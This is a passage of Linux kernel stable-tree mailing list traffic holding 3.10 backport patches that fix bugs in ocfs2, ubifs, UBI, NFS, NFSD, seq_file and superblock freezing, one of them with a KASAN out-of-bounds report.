Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ocfs2/file.c | 34 ++++++++++++++++++++++++----------
 1 file changed, 24 insertions(+), 10 deletions(-)

diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
index d0e8c0b..496af7f 100644
--- a/fs/ocfs2/file.c
+++ b/fs/ocfs2/file.c
@@ -1499,7 +1499,8 @@ static int ocfs2_zero_partial_clusters(struct inode *inode,
 				       u64 start, u64 len)
 {
 	int ret = 0;
-	u64 tmpend, end = start + len;
+	u64 tmpend = 0;
+	u64 end = start + len;
 	struct ocfs2_super *osb = OCFS2_SB(inode->i_sb);
 	unsigned int csize = osb->s_clustersize;
 	handle_t *handle;
@@ -1531,18 +1532,31 @@ static int ocfs2_zero_partial_clusters(struct inode *inode,
 	}
 
 	/*
-	 * We want to get the byte offset of the end of the 1st cluster.
+	 * If start is on a cluster boundary and end is somewhere in another
+	 * cluster, we have not COWed the cluster starting at start, unless
+	 * end is also within the same cluster. So, in this case, we skip this
+	 * first call to ocfs2_zero_range_for_truncate() truncate and move on
+	 * to the next one.
 	 */
-	tmpend = (u64)osb->s_clustersize + (start & ~(osb->s_clustersize - 1));
-	if (tmpend > end)
-		tmpend = end;
+	if ((start & (csize - 1)) != 0) {
+		/*
+		 * We want to get the byte offset of the end of the 1st
+		 * cluster.
+		 */
+		tmpend = (u64)osb->s_clustersize +
+			(start & ~(osb->s_clustersize - 1));
+		if (tmpend > end)
+			tmpend = end;
 
-	trace_ocfs2_zero_partial_clusters_range1((unsigned long long)start,
-						 (unsigned long long)tmpend);
+		trace_ocfs2_zero_partial_clusters_range1(
+			(unsigned long long)start,
+			(unsigned long long)tmpend);
 
-	ret = ocfs2_zero_range_for_truncate(inode, handle, start, tmpend);
-	if (ret)
-		mlog_errno(ret);
+		ret = ocfs2_zero_range_for_truncate(inode, handle, start,
+						    tmpend);
+		if (ret)
+			mlog_errno(ret);
+	}
 
 	if (tmpend < end) {
 		/*
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (61 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
                   ` (155 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vincent Stehlé, Artem Bityutskiy, Richard Weinberger, Willy Tarreau

From: Vincent Stehlé <vincent.stehle@intel.com>

commit c0082e985fdf77b02fc9e0dac3b58504dcf11b7a upstream.

An assertion in layout_in_gaps() verifies that the gap_lebs pointer is
below the maximum bound. When computing this maximum bound the idx_lebs
count is multiplied by sizeof(int), while C pointers arithmetic does take
into account the size of the pointed elements implicitly already. Remove
the multiplication to fix the assertion.

Fixes: 1e51764a3c2ac05a ("UBIFS: add new flash file system")
Signed-off-by: Vincent Stehlé <vincent.stehle@intel.com>
Cc: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
Signed-off-by: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/tnc_commit.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ubifs/tnc_commit.c b/fs/ubifs/tnc_commit.c
index 52a6559..3f620c0 100644
--- a/fs/ubifs/tnc_commit.c
+++ b/fs/ubifs/tnc_commit.c
@@ -370,7 +370,7 @@ static int layout_in_gaps(struct ubifs_info *c, int cnt)
 
 	p = c->gap_lebs;
 	do {
-		ubifs_assert(p < c->gap_lebs + sizeof(int) * c->lst.idx_lebs);
+		ubifs_assert(p < c->gap_lebs + c->lst.idx_lebs);
 		written = layout_leb_in_gaps(c, p);
 		if (written < 0) {
 			err = written;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (62 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
                   ` (154 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit 843741c5778398ea67055067f4cc65ae6c80ca0e upstream.

When the operation fails we also have to undo the changes
we made to ->xattr_names. Otherwise listxattr() will report
wrong lengths.

Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/xattr.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/fs/ubifs/xattr.c b/fs/ubifs/xattr.c
index 0f7139b..69a42f3 100644
--- a/fs/ubifs/xattr.c
+++ b/fs/ubifs/xattr.c
@@ -167,6 +167,7 @@ out_cancel:
 	host_ui->xattr_cnt -= 1;
 	host_ui->xattr_size -= CALC_DENT_SIZE(nm->len);
 	host_ui->xattr_size -= CALC_XATTR_BYTES(size);
+	host_ui->xattr_names -= nm->len;
 	mutex_unlock(&host_ui->ui_mutex);
 out_free:
 	make_bad_inode(inode);
@@ -514,6 +515,7 @@ out_cancel:
 	host_ui->xattr_cnt += 1;
 	host_ui->xattr_size += CALC_DENT_SIZE(nm->len);
 	host_ui->xattr_size += CALC_XATTR_BYTES(ui->data_len);
+	host_ui->xattr_names += nm->len;
 	mutex_unlock(&host_ui->ui_mutex);
 	ubifs_release_budget(c, &req);
 	make_bad_inode(inode);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (63 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
                   ` (153 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit aeeb14f763917ccf639a602cfbeee6957fd944a2 upstream.

If ubifs_tnc_next_ent() returns something else than -ENOENT
we leak file->private_data.

Signed-off-by: Richard Weinberger <richard@nod.at>
Reviewed-by: David Gstir <david@sigma-star.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 605af51..879242b 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -467,13 +467,14 @@ static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir)
 	}
 
 out:
+	kfree(file->private_data);
+	file->private_data = NULL;
+
 	if (err != -ENOENT) {
 		ubifs_err("cannot find next direntry, error %d", err);
 		return err;
 	}
 
-	kfree(file->private_data);
-	file->private_data = NULL;
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 166/319] ubifs: Abort readdir upon error
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (64 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
                   ` (152 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit c83ed4c9dbb358b9e7707486e167e940d48bfeed upstream.

If UBIFS is facing an error while walking a directory, it reports this
error and ubifs_readdir() returns the error code. But the VFS readdir
logic does not make the getdents system call fail in all cases. When the
readdir cursor indicates that more entries are present, the system call
will just return and the libc wrapper will try again since it also
knows that more entries are present.
This causes the libc wrapper to busy loop for ever when a directory is
corrupted on UBIFS.
A common approach do deal with corrupted directory entries is
skipping them by setting the cursor to the next entry. On UBIFS this
approach is not possible since we cannot compute the next directory
entry cursor position without reading the current entry. So all we can
do is setting the cursor to the "no more entries" position and make
getdents exit.

Signed-off-by: Richard Weinberger <richard@nod.at>
[wt: adjusted context]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 879242b..27b2c23 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -348,7 +348,8 @@ static unsigned int vfs_dent_type(uint8_t type)
  */
 static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir)
 {
-	int err, over = 0;
+	int err = 0;
+	int over = 0;
 	loff_t pos = file->f_pos;
 	struct qstr nm;
 	union ubifs_key key;
@@ -470,14 +471,12 @@ out:
 	kfree(file->private_data);
 	file->private_data = NULL;
 
-	if (err != -ENOENT) {
+	if (err != -ENOENT)
 		ubifs_err("cannot find next direntry, error %d", err);
-		return err;
-	}
 
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
-	return 0;
+	return err;
 }
 
 static loff_t ubifs_dir_llseek(struct file *file, loff_t offset, int whence)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (65 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
                   ` (151 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit a00052a296e54205cf238c75bd98d17d5d02a6db upstream.

Commit c83ed4c9dbb35 ("ubifs: Abort readdir upon error") broke
overlayfs support because the fix exposed an internal error
code to VFS.

Reported-by: Peter Rosin <peda@axentia.se>
Tested-by: Peter Rosin <peda@axentia.se>
Reported-by: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Tested-by: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Fixes: c83ed4c9dbb35 ("ubifs: Abort readdir upon error")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 27b2c23..db364d4 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -473,6 +473,14 @@ out:
 
 	if (err != -ENOENT)
 		ubifs_err("cannot find next direntry, error %d", err);
+	else
+		/*
+		 * -ENOENT is a non-fatal error in this context, the TNC uses
+		 * it to indicate that the cursor moved past the current directory
+		 * and readdir() has to stop.
+		 */
+		err = 0;
+
 
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (66 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
                   ` (150 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Boris Brezillon, Richard Weinberger, Willy Tarreau

From: Boris Brezillon <boris.brezillon@free-electrons.com>

commit ecbfa8eabae9cd73522d1d3d15869703c263d859 upstream.

scan_pool() does not mark the PEB for scrubing when bitflips are
detected in the EC header of a free PEB (VID header region left to
0xff).
Make sure we scrub the PEB in this case.

Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: dbb7d2a88d2a ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/ubi/fastmap.c | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/drivers/mtd/ubi/fastmap.c b/drivers/mtd/ubi/fastmap.c
index bf8108d..f6f1604 100644
--- a/drivers/mtd/ubi/fastmap.c
+++ b/drivers/mtd/ubi/fastmap.c
@@ -438,10 +438,11 @@ static int scan_pool(struct ubi_device *ubi, struct ubi_attach_info *ai,
 			unsigned long long ec = be64_to_cpu(ech->ec);
 			unmap_peb(ai, pnum);
 			dbg_bld("Adding PEB to free: %i", pnum);
+
 			if (err == UBI_IO_FF_BITFLIPS)
-				add_aeb(ai, free, pnum, ec, 1);
-			else
-				add_aeb(ai, free, pnum, ec, 0);
+				scrub = 1;
+
+			add_aeb(ai, free, pnum, ec, scrub);
 			continue;
 		} else if (err == 0 || err == UBI_IO_BITFLIPS) {
 			dbg_bld("Found non empty PEB:%i in pool", pnum);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (67 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
                   ` (149 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Trond Myklebust, Willy Tarreau

From: Trond Myklebust <trond.myklebust@primarydata.com>

commit 98b0f80c2396224bbbed81792b526e6c72ba9efa upstream.

On error, the callers expect us to return without bumping
nn->cb_users[].

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/callback.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
index e05c96e..57d3b5e 100644
--- a/fs/nfs/callback.c
+++ b/fs/nfs/callback.c
@@ -302,6 +302,7 @@ static int nfs_callback_up_net(int minorversion, struct svc_serv *serv, struct n
 err_socks:
 	svc_rpcb_cleanup(serv, net);
 err_bind:
+	nn->cb_users[minorversion]--;
 	dprintk("NFS: Couldn't create callback socket: err = %d; "
 			"net = %p\n", ret, net);
 	return ret;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 170/319] NFSD: Using free_conn free connection
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (68 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
                   ` (148 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Kinglong Mee, J . Bruce Fields, Willy Tarreau

From: Kinglong Mee <kinglongmee@gmail.com>

commit 3f42d2c428c724212c5f4249daea97e254eb0546 upstream.

Connection from alloc_conn must be freed through free_conn,
otherwise, the reference of svc_xprt will never be put.

Signed-off-by: Kinglong Mee <kinglongmee@gmail.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfsd/nfs4state.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
index 4a58afa..b0878e1 100644
--- a/fs/nfsd/nfs4state.c
+++ b/fs/nfsd/nfs4state.c
@@ -2193,7 +2193,8 @@ out:
 	if (!list_empty(&clp->cl_revoked))
 		seq->status_flags |= SEQ4_STATUS_RECALLABLE_STATE_REVOKED;
 out_no_session:
-	kfree(conn);
+	if (conn)
+		free_conn(conn);
 	spin_unlock(&nn->client_lock);
 	return status;
 out_put_session:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (69 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
                   ` (147 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chuck Lever, Anna Schumaker, Willy Tarreau

From: Chuck Lever <chuck.lever@oracle.com>

commit a4e187d83d88eeaba6252aac0a2ffe5eaa73a818 upstream.

Before commit 778be232a207 ("NFS do not find client in NFSv4
pg_authenticate"), the Linux callback server replied with
RPC_AUTH_ERROR / RPC_AUTH_BADCRED, instead of dropping the CB
request. Let's restore that behavior so the server has a chance to
do something useful about it, and provide a warning that helps
admins correct the problem.

Fixes: 778be232a207 ("NFS do not find client in NFSv4 ...")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/callback_xdr.c | 6 +++++-
 net/sunrpc/svc.c      | 5 +++++
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/fs/nfs/callback_xdr.c b/fs/nfs/callback_xdr.c
index e98ecf8..7f7a89a 100644
--- a/fs/nfs/callback_xdr.c
+++ b/fs/nfs/callback_xdr.c
@@ -884,7 +884,7 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r
 	if (hdr_arg.minorversion == 0) {
 		cps.clp = nfs4_find_client_ident(SVC_NET(rqstp), hdr_arg.cb_ident);
 		if (!cps.clp || !check_gss_callback_principal(cps.clp, rqstp))
-			return rpc_drop_reply;
+			goto out_invalidcred;
 	}
 
 	hdr_res.taglen = hdr_arg.taglen;
@@ -911,6 +911,10 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r
 	nfs_put_client(cps.clp);
 	dprintk("%s: done, status = %u\n", __func__, ntohl(status));
 	return rpc_success;
+
+out_invalidcred:
+	pr_warn_ratelimited("NFS: NFSv4 callback contains invalid cred\n");
+	return rpc_autherr_badcred;
 }
 
 /*
diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
index 89a588b..6dee8fb 100644
--- a/net/sunrpc/svc.c
+++ b/net/sunrpc/svc.c
@@ -1187,6 +1187,11 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
 				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
 			goto dropit;
 		}
+		if (*statp == rpc_autherr_badcred) {
+			if (procp->pc_release)
+				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
+			goto err_bad_auth;
+		}
 		if (*statp == rpc_success &&
 		    (xdr = procp->pc_encode) &&
 		    !xdr(rqstp, resv->iov_base+resv->iov_len, rqstp->rq_resp)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (70 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
                   ` (146 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Trond Myklebust, Anna Schumaker, Willy Tarreau

From: Trond Myklebust <trond.myklebust@primarydata.com>

commit 304020fe48c6c7fff8b5a38f382b54404f0f79d3 upstream.

If the file permissions change on the server, then we may not be able to
recover open state. If so, we need to ensure that we mark the file
descriptor appropriately.

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Tested-by: Oleg Drokin <green@linuxhacker.ru>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/nfs4state.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
index 2bdaf57..7d45b38 100644
--- a/fs/nfs/nfs4state.c
+++ b/fs/nfs/nfs4state.c
@@ -1464,6 +1464,9 @@ restart:
 					"Zeroing state\n", __func__, status);
 			case -ENOENT:
 			case -ENOMEM:
+			case -EACCES:
+			case -EROFS:
+			case -EIO:
 			case -ESTALE:
 				/*
 				 * Open state on this file cannot be recovered
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (71 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
                   ` (145 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Al Viro, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 088bf2ff5d12e2e32ee52a4024fec26e582f44d3 upstream.

seq_read() is a nasty piece of work, not to mention buggy.

It has (I think) an old bug which allows unprivileged userspace to read
beyond the end of m->buf.

I was getting these:

    BUG: KASAN: slab-out-of-bounds in seq_read+0xcd2/0x1480 at addr ffff880116889880
    Read of size 2713 by task trinity-c2/1329
    CPU: 2 PID: 1329 Comm: trinity-c2 Not tainted 4.8.0-rc1+ #96
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    Call Trace:
      kasan_object_err+0x1c/0x80
      kasan_report_error+0x2cb/0x7e0
      kasan_report+0x4e/0x80
      check_memory_region+0x13e/0x1a0
      kasan_check_read+0x11/0x20
      seq_read+0xcd2/0x1480
      proc_reg_read+0x10b/0x260
      do_loop_readv_writev.part.5+0x140/0x2c0
      do_readv_writev+0x589/0x860
      vfs_readv+0x7b/0xd0
      do_readv+0xd8/0x2c0
      SyS_readv+0xb/0x10
      do_syscall_64+0x1b3/0x4b0
      entry_SYSCALL64_slow_path+0x25/0x25
    Object at ffff880116889100, in cache kmalloc-4096 size: 4096
    Allocated:
    PID = 1329
      save_stack_trace+0x26/0x80
      save_stack+0x46/0xd0
      kasan_kmalloc+0xad/0xe0
      __kmalloc+0x1aa/0x4a0
      seq_buf_alloc+0x35/0x40
      seq_read+0x7d8/0x1480
      proc_reg_read+0x10b/0x260
      do_loop_readv_writev.part.5+0x140/0x2c0
      do_readv_writev+0x589/0x860
      vfs_readv+0x7b/0xd0
      do_readv+0xd8/0x2c0
      SyS_readv+0xb/0x10
      do_syscall_64+0x1b3/0x4b0
      return_from_SYSCALL_64+0x0/0x6a
    Freed:
    PID = 0
    (stack is not available)
    Memory state around the buggy address:
     ffff88011688a000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     ffff88011688a080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    >ffff88011688a100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
		       ^
     ffff88011688a180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
     ffff88011688a200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    ==================================================================
    Disabling lock debugging due to kernel taint

This seems to be the same thing that Dave Jones was seeing here:

  https://lkml.org/lkml/2016/8/12/334

There are multiple issues here:

  1) If we enter the function with a non-empty buffer, there is an attempt
     to flush it. But it was not clearing m->from after doing so, which
     means that if we try to do this flush twice in a row without any call
     to traverse() in between, we are going to be reading from the wrong
     place -- the splat above, fixed by this patch.

  2) If there's a short write to userspace because of page faults, the
     buffer may already contain multiple lines (i.e. pos has advanced by
     more than 1), but we don't save the progress that was made so the
     next call will output what we've already returned previously. Since
     that is a much less serious issue (and I have a headache after
     staring at seq_read() for the past 8 hours), I'll leave that for now.

Link: http://lkml.kernel.org/r/1471447270-32093-1-git-send-email-vegard.nossum@oracle.com
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Reported-by: Dave Jones <davej@codemonkey.org.uk>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/seq_file.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/fs/seq_file.c b/fs/seq_file.c
index 3dd44db..c009e60 100644
--- a/fs/seq_file.c
+++ b/fs/seq_file.c
@@ -206,8 +206,10 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
 		size -= n;
 		buf += n;
 		copied += n;
-		if (!m->count)
+		if (!m->count) {
+			m->from = 0;
 			m->index++;
+		}
 		if (!size)
 			goto Done;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (72 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
                   ` (144 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Oleg Nesterov, Al Viro, Willy Tarreau

From: Oleg Nesterov <oleg@redhat.com>

commit 89f39af129382a40d7cd1f6914617282cfeee28e upstream.

Change thaw_super() to check frozen != SB_FREEZE_COMPLETE rather than
frozen == SB_UNFROZEN, otherwise it can race with freeze_super() which
drops sb->s_umount after SB_FREEZE_WRITE to preserve the lock ordering.

